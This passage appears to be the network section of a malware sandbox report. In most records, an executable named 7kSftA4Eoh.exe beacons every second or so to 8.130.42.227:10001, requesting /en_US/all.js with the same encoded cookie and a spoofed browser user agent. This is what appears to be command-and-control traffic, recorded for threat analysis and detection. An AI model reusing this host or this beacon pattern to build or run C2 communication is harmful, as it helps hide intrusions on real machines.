                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:20.290249109 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:19 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                70192.168.2.4498078.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:20.406044960 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:21.351322889 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:21 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                71192.168.2.4498088.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:21.466885090 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:22.404139042 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:22 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                72192.168.2.4498098.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:22.516719103 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:23.470350027 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:23 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                73192.168.2.4498108.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:23.596708059 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:24.563240051 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:24 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                74192.168.2.4498118.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:24.687603951 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:25.623217106 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:25 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                75192.168.2.4498128.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:25.752697945 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:26.699789047 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:26 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                76192.168.2.4498138.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:26.817373991 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:27.765852928 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:27 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                77192.168.2.4498148.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:27.892714977 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:28.877537966 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:28 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                78192.168.2.4498158.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:28.998631954 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:29.989542961 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:29 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                79192.168.2.4498168.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:30.111059904 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:31.053788900 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:30 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                80192.168.2.4498178.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:31.172106981 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:32.116039991 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:31 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                81192.168.2.4498188.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:32.264465094 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:33.219223976 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:33 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                82192.168.2.4498198.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:33.342219114 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:34.334094048 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                83192.168.2.4498208.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:34.450947046 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:35.513272047 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:35 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                84192.168.2.4498218.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:35.624229908 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:39.577821016 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:39 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                85192.168.2.4498228.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:39.706851006 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:40.809396029 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:40 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                86192.168.2.4498238.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:40.973115921 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:41.920358896 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                87192.168.2.4498248.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:42.038556099 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:42.984538078 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:42 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                88192.168.2.4498258.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:43.109435081 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:44.063050032 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:43 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                89192.168.2.4498268.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:44.186863899 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:45.136379957 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:44 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                90192.168.2.4498278.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:45.249651909 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:46.218566895 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:46 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                91192.168.2.4498288.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:46.344548941 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:47.282550097 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:47 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                92192.168.2.4498298.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:47.408241987 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:48.371803045 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:48 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                93192.168.2.4498308.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:48.639575005 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:49.608248949 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:49 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                94192.168.2.4498318.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:49.718794107 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:50.703569889 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:50 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                95192.168.2.4498328.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 1, 2024 09:18:50.912420034 CEST404OUTGET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:51.880003929 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:51 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                96192.168.2.4498338.130.42.227100016992C:\Users\user\Desktop\7kSftA4Eoh.exe
